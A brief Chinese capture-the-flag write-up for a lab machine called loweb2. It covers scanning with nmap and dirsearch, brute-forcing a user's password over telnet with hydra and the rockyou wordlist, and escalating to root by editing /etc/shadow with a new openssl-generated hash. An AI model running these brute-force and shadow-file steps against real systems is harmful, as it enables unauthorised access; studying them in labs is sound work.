靶机loweb2

扫出192.168.177.130
同时nmap扫描192.168.177.130


有80端口,dirsearch扫描,没有任何东西。

尝试ssh连接

得到用户名 b.taylor
使用hydra爆破
hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt telnet://192.168.177.130 -V -I

得到密码rockyou,登录

shadow提权
发现这个用户附加了shadow组

nano /etc/shadow
nano编辑器:Ctrl+O保存 Ctrl+X退出
openssl生成加密
openssl passwd 123456
$1$tZiMNfo/$v/H7.CkEWtmWZ5VEUUL2D0




浙公网安备 33010602011771号